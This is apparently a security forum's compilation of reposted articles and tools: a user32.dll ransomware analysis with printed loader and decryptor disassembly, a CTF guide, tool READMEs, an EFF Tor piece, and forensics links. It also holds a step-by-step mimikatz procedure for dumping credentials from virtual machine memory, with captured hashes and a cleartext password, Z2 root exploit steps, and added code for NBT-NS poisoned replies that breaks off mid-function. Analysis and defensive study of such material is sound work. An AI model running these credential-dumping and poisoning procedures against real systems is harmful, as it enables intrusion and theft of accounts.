7e46d4eb mov ecx, eax
7e46d4ed add eax, 0x13bc
7e46d4f2 mov eax, [eax]               ; EAX becomes address of NtQueryVirtualMemory
7e46d4f4 add eax, 0xfffff5f0          ; EAX becomes address of NtAllocateVirtualMemory
7e46d4f9 push 0x40
7e46d4fb push 0x3000
7e46d500 lea ecx, [ebp-0x4]
7e46d503 mov [ecx], 0xc576
7e46d509 push ecx
7e46d50a push 0
7e46d50c lea ecx, [ebp-0x8]
7e46d50f mov [ecx], 0
7e46d515 push ecx
7e46d516 push 0xff
7e46d518 call eax                     ; Call NtAllocateVirtualMemory
7e46d51a mov edi, [ebp-0x8]           ; EDI = allocated address
7e46d51d mov eax, edi
7e46d51f mov esi, [ebp+0x4C]          ; ESI = base-address of user32.dll (7E410000)
7e46d522 add esi, 0x8d200             ; ESI = address of encrypted payload in resource section
7e46d528 mov ecx, 0x98bb
7e46d52d rep movs es:[edi], ds:[esi]  ; Copy to allocated (executable) range
7e46d52f leave
7e46d530 add eax, 0x981e              ; EAX = address of decryption code
7e46d535 jmp eax                      ; Start decryption !!

As can be seen from this code an executable block of memory is allocated. In order to do that, the address of NtAllocateVirtualMemory is calculated using the address of NtQueryVirtualMemory, which was obtained from the IAT of user32.dll. The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below:

0:000> r
eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb
eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
0:000> u eax l20
0029981e call 00299823
00299823 pop edx                          ; EDX = current location !
00299824 sub edx,7FFA2F22h
0029982a push esi
0029982b lea esi,[edx+7FFA2F1Dh]          ; ESI = allocated mem-base (290000)
00299831 mov ecx,981Eh                    ; ECX = size to decrypt (num bytes)
00299836 sub esi,ecx
00299838 push esi
00299839 mov ebx,6FAAEh                   ; The XOR key (BL only, so AEh)
0029983e xor byte ptr [esi],bl            ; Decrypt byte-by-byte
00299840 inc esi
00299841 inc ebx                          ; Modify XOR key for each byte (+1)
00299842 loop 0029983e
00299844 pop eax
00299845 pop ecx
00299846 mov dword ptr [eax+12h],ecx
00299849 jmp eax                          ; Jump to allocated mem-base, which is now decrypted.

The decryption of the payload uses an XOR based decryption scheme where the XOR value for each byte to decrypt is incremented after each operation. Once all bytes in the allocated memory range are decrypted, the now plain code is executed.

Note the first two instructions of this decryption code, where a call/pop combination is used to obtain the current address. This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so automating the payload and decryptor to avoid static detection can be easily accomplished.

Once the ransomware becomes active, some typical ransomware behavior is performed:
- Windows Safe Mode is disabled
- Task Manager is blocked
- Command Prompt is blocked
- Registry Editor is blocked

… and of course the police themed picture is shown where a ransom fee is demanded in order to release the PC (see picture at the top of this article). Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection.

Blocking CD-ROM drives

A new property of this particular ransomware is that it disables CD-ROM drives. This makes it for some computers harder to clean the system as is explained below. When HitmanPro detects a system file that is infected, it searches for a white-listed variant on the computer. This is because Windows tends to keep a copy of system files in multiple locations on the hard disk.
If HitmanPro cannot find a white-listed known safe version, it prompts for the Windows installation CD/DVD media that came with the computer. This is a very useful feature of HitmanPro and it has been in HitmanPro for years to return infected system files to pristine state! But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files.

New Cloud Service

Today we release a BETA build of HitmanPro that queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media.

32-bit: http://dl.surfright.nl/HitmanProBeta.exe
64-bit: http://dl.surfright.nl/HitmanProBeta_x64.exe

Samples:
3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1
3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C
7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA

Sursa: Ransomware infecting user32.dll |
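The decryption loop shown in the post above, reimplemented as an added Python example (this is not SurfRight's code and not the malware's own payload). The stub does `mov ebx, 6FAAEh` / `xor [esi], bl` / `inc ebx`, so byte i of the copied blob is XORed with (0xAE + i) & 0xFF; only the first 0x981e bytes are decrypted and the trailing stub is left alone. Because a new variant only has to change the size and the starting key, a 256-try brute force against a known plaintext prefix recovers the key. The blob it works on is constructed inline, and the three-byte `push ebp / mov ebp, esp` prologue used as known plaintext is an assumption for the demonstration, not something taken from the sample.

```python
"""Rolling-XOR decryptor mirroring the user32.dll resource payload stub.

Added example, not SurfRight's or the malware's code.  The constructed blob
stands in for the 0x98bb bytes copied out of .rsrc (encrypted body followed
by the plain decryptor stub).
"""

PAYLOAD_SIZE = 0x981E   # bytes the stub decrypts (ECX in the listing)
COPIED_SIZE = 0x98BB    # bytes copied out of .rsrc: payload + stub
SAMPLE_KEY = 0x6FAAE    # initial EBX; only BL (0xAE) takes part in the XOR


def rolling_xor(data: bytes, key: int) -> bytes:
    """Symmetric transform: out[i] = data[i] ^ ((key + i) & 0xFF)."""
    k = key & 0xFF
    out = bytearray(len(data))
    for i, b in enumerate(data):
        out[i] = b ^ k
        k = (k + 1) & 0xFF          # 'inc ebx': only the low byte matters
    return bytes(out)


def decrypt_copied_blob(blob: bytes, size: int = PAYLOAD_SIZE, key: int = SAMPLE_KEY) -> bytes:
    """Do what the stub does: decrypt the first `size` bytes, keep the stub tail as-is."""
    return rolling_xor(blob[:size], key) + blob[size:]


def recover_initial_key(blob: bytes, known_prefix: bytes):
    """Brute-force the 1-byte starting key against known plaintext at the payload start.

    The first byte already pins the key (k = blob[0] ^ plain[0]); the remaining
    prefix bytes confirm the +1-per-byte schedule rather than a fixed key.
    """
    for k in range(256):
        if rolling_xor(blob[:len(known_prefix)], k) == known_prefix:
            return k
    return None


def build_test_blob(plain: bytes, stub: bytes, key: int = SAMPLE_KEY) -> bytes:
    """Constructed stand-in for the resource payload: encrypted body + plain stub."""
    return rolling_xor(plain, key) + stub


if __name__ == "__main__":
    # Constructed payload: an assumed 'push ebp / mov ebp, esp' prologue plus filler,
    # followed by a fake stub ('call $+5 / pop edx', as in the real decryptor).
    plain = bytes([0x55, 0x8B, 0xEC]) + bytes(range(256)) * 4
    stub = b"\xE8\x00\x00\x00\x00\x5A"
    blob = build_test_blob(plain, stub)
    print("recovered key: 0x%02x" % recover_initial_key(blob, b"\x55\x8B\xEC"))
    assert decrypt_copied_blob(blob, size=len(plain)) == plain + stub
```

To use this on a real infected user32.dll you would carve the 0x98bb bytes at file offset 0x8d200 of the mapped image and pass the real size; on an unknown variant, run `recover_initial_key` with whatever prologue the decrypted code is expected to start with.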
  12. How to Get Started in CTF by Steve Vittitoe Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time. If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging. If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started. 1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. 
Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include: Practical Reverse Engineering Reversing: Secrets of Reverse Engineering The IDA Pro Book 2) Cryptography. While this is not my personal strength, here are some resources to check out: Applied Cryptography Practical Cryptography Cryptography I 3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started. 4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience. 5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. 
There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through: Hacking: The Art of Exploitation The Shellcoders Handbook The Art of Software Security Assessment 6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems. Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics. Sursa: How to Get Started in CTF | Endgame.
  13. httpie
HTTPie: a CLI, cURL-like tool for humans

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized responses. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers. HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Table of Contents: Main Features, Installation, Usage, HTTP Method, Request URL, Request Items, JSON, Forms, HTTP Headers, Authentication, Proxies, HTTPS, Output Options, Redirected Input, Terminal Output, Redirected Output, Download Mode, Streamed Responses, Sessions, Config, Scripting, Interface Design, Contribute, Logo, Authors, Licence, Changelog

Main Features
- Expressive and intuitive syntax
- Formatted and colorized terminal output
- Built-in JSON support
- Forms and file uploads
- HTTPS, proxies, and authentication
- Arbitrary request data
- Custom headers
- Persistent sessions
- Wget-like downloads
- Python 2.6, 2.7 and 3.x support
- Linux, Mac OS X and Windows support
- Documentation
- Test coverage

Sursa: https://github.com/jakubroztocil/httpie
  14. termcoin
[h=1]termcoin[/h] A bitcoin wallet and blockchain explorer for your terminal. termcoin bitcoin wallet and blockchain explorer for your terminal, written for node.js termcoin's UI is rendered by blessed which is a full ncurses replacement and high-level widget library. Expect mouse support, eye-candy hover effects, and so-on. termcoin's bitcoin implementation is now based on BCoin which fully implements BIP-37's description of bloom filters. This basically means you don't have to download the entire blockchain to use your wallet. You ask for and store only the transactions relevant to you (broadcasted in your bloom filter), while at the same time being able to verify the merkleroot of blocks. The blockchain explorer currently uses the blockchain.info json api as a backend. In the future, termcoin will leave an option for the user to download the entire blockchain in the background (using bcoin - out of sheer obsession, I implemented the original satoshi protocol in bcoin), which means you will be able to explore the blockchain on your local disk instead of waiting for api calls to return. For data management, termcoin uses tiny as the database necessary to store the (small) blockchain data and transactions relevant to your account. BCoin was conceived brilliantly, and Fedor Indutny also went to the trouble of writing an ecdsa and bignumber library in pure javascript to supplement BCoin. With all this being said, it's worth pointing out that termcoin is written entirely in pure javascript. All of this means: No compiling a database binding No compiling a binding to an ecdsa library No linking to ncurses No running a bitcoin rpc server in the background No downloading a 20gb blockchain Just use your wallet and enjoy! Termcoin uses a basic JSON wallet format with private keys that are compatible with bitcoind's importprivkey/dumpprivkey (128-prefixed+checksummed+base58) keys. 
(It also supports AES-CBC encryption for your private keys, just like the official bitcoin client). NOTE: Termcoin used to use bitcoind/litecoind/etc as a backend. This backend is still supported for other currencies. It's just not as featureful due to limitations in the [coin]d rpc server. [h=2]Screenshots[/h] Sursa: https://github.com/chjj/termcoin
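The "128-prefixed + checksummed + base58" private key format the README refers to is bitcoind's Wallet Import Format: a 0x80 version byte, the 32-byte key, an optional 0x01 flag for compressed public keys, and the first four bytes of SHA256(SHA256(payload)) as a checksum, all base58-encoded. The following is an added Python example, not termcoin's or bitcoind's code; it encodes and decodes that format with only the standard library and rejects a key whose checksum does not verify. The private key used below is a widely published WIF test vector, not a real wallet key.

```python
"""Wallet Import Format (WIF) encode/decode, as used by bitcoind's
importprivkey/dumpprivkey.  Added example; not termcoin's or bitcoind's code."""
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
VERSION_MAINNET, VERSION_TESTNET = 0x80, 0xEF   # 128 is the "128-prefix" the README mentions


def b58encode(data: bytes) -> str:
    """Base58 with leading-zero bytes preserved as leading '1' characters."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def b58decode(text: str) -> bytes:
    n = 0
    for ch in text:
        n = n * 58 + B58_ALPHABET.index(ch)   # ValueError on characters outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_ones + body


def checksum(payload: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def privkey_to_wif(priv: bytes, compressed: bool = False, testnet: bool = False) -> str:
    if len(priv) != 32:
        raise ValueError("private key must be 32 bytes")
    version = VERSION_TESTNET if testnet else VERSION_MAINNET
    payload = bytes([version]) + priv + (b"\x01" if compressed else b"")
    return b58encode(payload + checksum(payload))


def wif_to_privkey(wif: str):
    """Return (32-byte key, compressed_flag); raise ValueError on any corruption."""
    raw = b58decode(wif)
    if len(raw) < 5:
        raise ValueError("WIF too short")
    payload, chk = raw[:-4], raw[-4:]
    if checksum(payload) != chk:
        raise ValueError("WIF checksum mismatch")
    if payload[0] not in (VERSION_MAINNET, VERSION_TESTNET):
        raise ValueError("unexpected WIF version byte 0x%02x" % payload[0])
    if len(payload) == 33:
        return payload[1:], False
    if len(payload) == 34 and payload[-1] == 0x01:
        return payload[1:33], True
    raise ValueError("unexpected WIF payload length %d" % len(payload))


def wif_is_valid(wif: str) -> bool:
    try:
        wif_to_privkey(wif)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Published WIF test vector (not a real wallet key).
    key = bytes.fromhex("0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D")
    wif = privkey_to_wif(key)
    print(wif)                                       # 5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbTLvyTJ
    print(privkey_to_wif(key, compressed=True))      # K... / L... form for compressed pubkeys
    print(wif_is_valid(wif), wif_is_valid(wif[:-1] + "K"))
```

The checksum is the only integrity protection in the format, so a wallet that imports keys should reject on mismatch rather than "repair" the key; a single mistyped base58 character is caught by it, as the last call above shows.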
  15. Tor Is For Everyone: Why You Should Use Tor

EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign—which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation—is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes—more than during the entire first Tor Challenge. This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet.

What is Tor?

Tor is a network and a software package that helps you anonymously use the Internet. Specifically, Tor hides the source and destination of your Internet traffic; this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything.

How does Tor help me?

This graphic shows how Tor and https can work together to protect your privacy on the Internet. Basically, Tor encrypts the data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of Tor—along with HTTPS Everywhere—can be one of the best ways to ensure your browsing will remain anonymous.
But I don't need privacy, I have nothing to hide!

Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private. Tor can also help prevent online tracking more generally as well. Proper use of Tor can circumvent most third party trackers that governments and corporations can use to track your browsing habits and send you obnoxious intrusive advertisements. Tor can also protect your data from hackers on your network. Tor can also help you get around censorship and firewalls from the filter at your school or office or even help you circumvent firewalls or censorship put in place by your government.

How do I use Tor?

The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity. If you prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off of a live CD. It is configured so that all Internet connections run through Tor; and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer. If you want to use Tor on your Android phone, check out Orbot, it can run your browsing and other programs through Tor.

Tor sounds great. What can I do to help?

To help make Tor faster and more secure one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network the more speed and security Tor has.
Setting up a relay may also improve your own personal anonymity. But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos then it is much less so. So if I use Tor will I have perfect anonymity all of the time? Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make. When used properly Tor is one of the best tools for internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today. Sursa: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor
  16. Blackberry Forensics

1.0. UNLOCKED BLACKBERRY DEVICES
Unlocked BlackBerry device with no password

Situation
• BB contains memory card and SIM.
• Which type of data extraction should be performed and in what order?
• Physical, File System, then Logical?

Examiner Considerations:
• There are a variety of tools available to the examiner.
• Start Physical, if supported, then move to File System and Logical.
• Wear Leveling
• A data structure at the logical level, in the form of a logical backup/acquisition, is different than the same record at the physical level.
• ** In rare cases performing a physical with UFED may cause the device to reset itself to factory default.
• This is referred to by Cellebrite as “cache memory reset”.

Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf
  17. DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
  18. Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf
  19. [h=3]Mimikatz Against Virtual Machine Memory Part 2[/h]

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012

First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols

0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols
Loading unloaded module list
.........

Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above)

For VMware ESXi i just needed to pass the .vmsn file

The rest follows the same flow as the previous post

1. Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe

5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................

6. Run Mimikatz

kd> !mimikatz

7.
Drink Beers Posted by CG at 11:45 AM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2
  20. [h=3]Mimikatz Against Virtual Machine Memory Part 1[/h]

Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me.

I can't count the number of times i've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory.

While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject:
- Extract Windows passwords from VMware .vmem file
- WinDbg et l’extension de mimikatz | Blog de Gentil Kiwi
- Password dump from a Hyper-V Virtual Machine´s memory | vNiklas Virtualization blog

This of course sent me down the rabbit hole to see if I could do it.

Remko's post mentions you need a few things:
- The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog); WinDBG | Blog de Gentil Kiwi
- The Windows Memory Toolkit: MoonSols Windows Memory Toolkit | MoonSols
- Current mimikatz that supports the windbg magic: https://github.com/gentilkiwi/mimikatz

Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on. Restrictions are 32bit up to Windows Server 2008.

The process:

#1 Copy the vmem/vmsn from the remote host

#2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below)

C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp
bin2dmp - v2.1.0.20140115
Convert raw memory dump images into Microsoft crash dump files.
Copyright (C) 2007 - 2014, Matthieu Suiche
Copyright (C) 2012 - 2014, MoonSols Limited

Initializing memory descriptors... Done.
Directory Table Base is 0x124000
Looking for Kernel Base...
Looking for kernel variables... Done.
Loading file... Done.
nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0

stuff happens

[0x0000000040000000 of 0x0000000040000000]
[0x000000001DAFE000 of 0x000000
MD5 = E8C2F318FA528285281C21B3141E7C51
Total time for the conversion: 0 minutes 14 seconds.

you should now have a .dmp file you can load into windbg

#3 Load the dmp file into windbg

Gotcha #2: You may have to run .symfix and .reload

kd> .symfix
kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
.....
Loading User Symbols
Loading unloaded module list
....

#4 Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13)
 .## ^ ##.  Windows build 6002
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    WinDBG extension !                               * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

The tool output will walk you through the rest

#5 Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS fffffa800dba26d0
    SessionId: 0  Cid: 023c    Peb: 7fffffd4000  ParentCid: 01e4
    DirBase: 2e89f000  ObjectTable: fffff880056562c0  HandleCount: 1092.
    Image: lsass.exe

#6 switch to the lsass context fffffa800dba26d0 in this case

kd> .process /r /p fffffa800dba26d0
Implicit process is now fffffa80`0dba26d0
Loading User Symbols
................................................................
......................
#7 Load mimikatz

kd> !mimikatz

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-3C4WXGGN8QE$
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-20
        msv :
         [00000002] Primary
         * Username : WIN-3C4WXGGN8QE$
         * Domain   : UNLUCKYCOMPANY
         * NTLM     : ea2ed0b14406a168791adf5aee78fd0b
         * SHA1     : ab7bd2f6a64cf857c9d69dd65916622e3dc25424
        tspkg : KO
---SNIP---
Authentication Id : 0 ; 173319 (00000000:0002a507)
Session           : Interactive from 1
User Name         : Administrator
Domain            : UNLUCKYCOMPANY
SID               : S-1-5-21-2086621178-2413078777-1398328459-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : UNLUCKYCOMPANY
         * LM       : e52cac67419a9a2238f10713b629b565
         * NTLM     : 64f12cddaa88057e06a81b54e73b949b
         * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
        tspkg :
         * Username : Administrator
         * Domain   : UNLUCKYCOMPANY
         * Password : Password1
        wdigest :
         * Username : Administrator
         * Domain   : UNLUCKYCOMPANY
         * Password : Password1
        kerberos :
         * Username : Administrator
         * Domain   : UNLUCKYCOMPANY.NET
         * Password : Password1
         * Key List
---SNIP---

There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.

CG

Posted by CG at 12:37 PM

Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1
  21. Z2 Root Exploit

Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for Z2 phone. I have a Z2 phone but just haven't tested it on that one yet.

Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4]

DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M=

Requirements:
1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched
2. Use Linux or something that has 'bash'

Instructions:
1. Extract exploit.tar.gz and run ./root1.sh
2. Crash the system menu that appears by doing System Info -> Configuration or similar.
3. Run ./root2.sh
4. Repeat Step #2
5. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it.

Tell me if it works or if you get any errors. Thanks.

Sursa: Z2 Root Exploit - xda-developers
  22. [h=2]Low level PC attack papers[/h]BIOS/Firmware: Attacking Intel BIOS BootKit: eEye BootRoot Bootkit: Deep Boot ... Sursa: A Timeline made with Timeglider, web-based timeline software
  23. [h=1]Responder[/h]

Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

[h=1]INTRODUCTION[/h]

This tool is first an LLMNR, NBT-NS and MDNS responder; it will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool only answers File Server Service requests, which is for SMB. The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want this tool to answer to the Workstation Service request name suffix.

Sursa: https://github.com/Spiderlabs/Responder
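The suffix-based targeting the README describes, as an added Python example (not Responder's code): an NBT-NS name query carries the queried name in RFC 1001 first-level encoding, 32 ASCII letters that decode to 15 name characters plus a 16th suffix byte identifying the service (0x20 = File Server Service, 0x00 = Workstation Service). The example builds a query, parses it back, decides whether a poisoner in default mode or in "-r"-style mode would answer, and assembles the positive name response that points the victim at a chosen IP. All packets are constructed inline; the spoofed address and the 165-second TTL are arbitrary values chosen for the demonstration.

```python
"""NBT-NS name query parsing and suffix-targeted poisoned reply.

Added illustration, not Responder's own code.  Packet layouts follow
RFC 1002 (NetBIOS over TCP/UDP); all packets here are constructed inline.
"""
import struct

# 16th byte of the NetBIOS name: which service the client is looking for
SUFFIX_WORKSTATION = 0x00
SUFFIX_FILE_SERVER = 0x20
SUFFIX_NAMES = {
    0x00: "Workstation Service", 0x03: "Messenger Service",
    0x1B: "Domain Master Browser", 0x1C: "Domain Controllers",
    0x1D: "Master Browser", 0x20: "File Server Service",
}
QTYPE_NB, QCLASS_IN = 0x0020, 0x0001


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """First-level encoding: 15 space-padded chars + suffix, each nibble as 'A' + nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
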